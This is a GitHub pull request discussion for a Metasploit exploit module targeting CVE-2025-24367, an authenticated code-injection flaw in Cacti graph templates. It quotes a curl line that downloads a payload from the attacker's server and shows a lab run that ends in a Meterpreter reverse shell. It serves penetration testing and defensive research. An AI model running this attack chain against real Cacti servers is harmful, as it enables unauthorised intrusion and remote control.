Cacti Graph Template Authenticated RCE [CVE-2025-24367]#20799
Merged
smcintyre-r7 merged 7 commits intorapid7:masterfrom Jan 22, 2026
Merged
Cacti Graph Template Authenticated RCE [CVE-2025-24367]#20799smcintyre-r7 merged 7 commits intorapid7:masterfrom
smcintyre-r7 merged 7 commits intorapid7:masterfrom
Conversation
jheysel-r7
changed the title
jheysel-r7
added
module
rn-modules
bwatters-r7
reviewed
Jan 8, 2026
Co-authored-by: Brendan <bwatters@rapid7.com>
smcintyre-r7
requested changes
Jan 15, 2026
| execute_payload_command = "php\\x20#{on_disk_payload_name}" | ||
| end | ||
|
|
||
| upload_payload_command = "curl\\x20#{datastore['SRVHOST']}\\x3a#{datastore['SRVPORT']}/#{hosted_payload_name}\\x20-o\\x20#{on_disk_payload_name}" |
Contributor
There was a problem hiding this comment.
I think this is going to break when SSL is set to true because, due to known issues, that will cause the server to also be SSL. See #20740. I think what you'd want to do here is use #get_uri which will return the URL, accounting for SSL and whether or not SRVHOST is an IPv4 or IPv6 address by wrapping it as necessary. The catch is you'll need to escape the necessary characters yourself to place it here. I'd also suggest adding the flag to curl that ignores self-signed SSL certs.
Contributor
Author
There was a problem hiding this comment.
Thanks for raising these issues, all good points. Currently the upload_payload_command length is 45 characters. The maximum payload size appears to be 47 characters, as a payload of 48 characters breaks the exploit. I'll add that as a comment here.
I only have room to add 2 additional characters to upload_payload_command with the SRVHOST and SRVPORT I have defined, which means SSL cannot be used as adding -k https:// will exceed the limit. Also using an IPv6 would not be possible. I've added guards to ensure the limit is not exceeded by any of these factors in c45309e
github-project-automation
Bot
moved this from Todo
to Waiting on Contributor
in Metasploit Kanban
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
smcintyre-r7
requested changes
Jan 22, 2026
smcintyre-r7
approved these changes
Jan 22, 2026
Contributor
smcintyre-r7
left a comment
smcintyre-r7
left a comment
There was a problem hiding this comment.
Working with SSL now too.
msf exploit(multi/http/cacti_graph_template_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(multi/http/cacti_graph_template_rce) >
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.28
[*] Attempting login with user `admin` and password `admin`
[+] Logged in
[+] The target is vulnerable.
[*] Using URL: http://192.168.159.128:808/s
[*] Payload execution command: php\x20i.php
[*] Template update response: HTTP 200
[*] Trigger template update response: HTTP 200
[*] 192.168.159.128 cacti_graph_template_rce - Request 'GET /s'
[*] 192.168.159.128 cacti_graph_template_rce - Sending payload ...
[+] PHP payload uploaded successfully to /cacti/s.php
[*] Template update response: HTTP 200
[*] Trigger template update response: HTTP 200
[*] Sending stage (41224 bytes) to 192.168.159.128
[+] Deleted s.php
[+] Deleted V.php
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.128:58896) at 2026-01-22 12:18:27 -0500
[*] Server stopped.
msf exploit(multi/http/cacti_graph_template_rce) > show options
Module options (exploit/multi/http/cacti_graph_template_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD admin yes Password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, socks5h,
http, sapni, socks4
RHOSTS 192.168.159.128 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit
.html
RPORT 8443 yes The target port (TCP)
SRVHOST 192.168.159.128 yes The local host or network interface to listen on. This must be an address on the local machine or
0.0.0.0 to listen on all addresses.
SRVPORT 808 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /cacti yes The base URI of Cacti
URIPATH no The URI to use for this exploit (default is random)
USERNAME admin yes User to login with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux
View the full module info with the info, or info -d command.
msf exploit(multi/http/cacti_graph_template_rce) >
Contributor
Release NotesThis adds an exploit for CVE-2025-24367 which is an unauthenticated RCE in Cacti. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
3 participants
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
This module exploits an authenticated remote code execution vulnerability in Cacti versions prior to 1.2.29. Authenticated users can upload a graph template through the /graph_templates.php endpoint. The right_axis_label parameter is vulnerable to code injection, allowing attackers to execute arbitrary commands on the server. The payload is length limited, due to this constraint the module starts an HTTP server and hosts the payload. The initial payload downloads the full payload using curl from the attacker's server and saves it to the web root of the cacti server before executing.
Verification
use linux/http/cacti_graph_template_rceset target <target>run rhost=<target address> rport=<target port> lhost=<local address> username=<username> password=<password>Testing
Linux target Cacti 1.2.28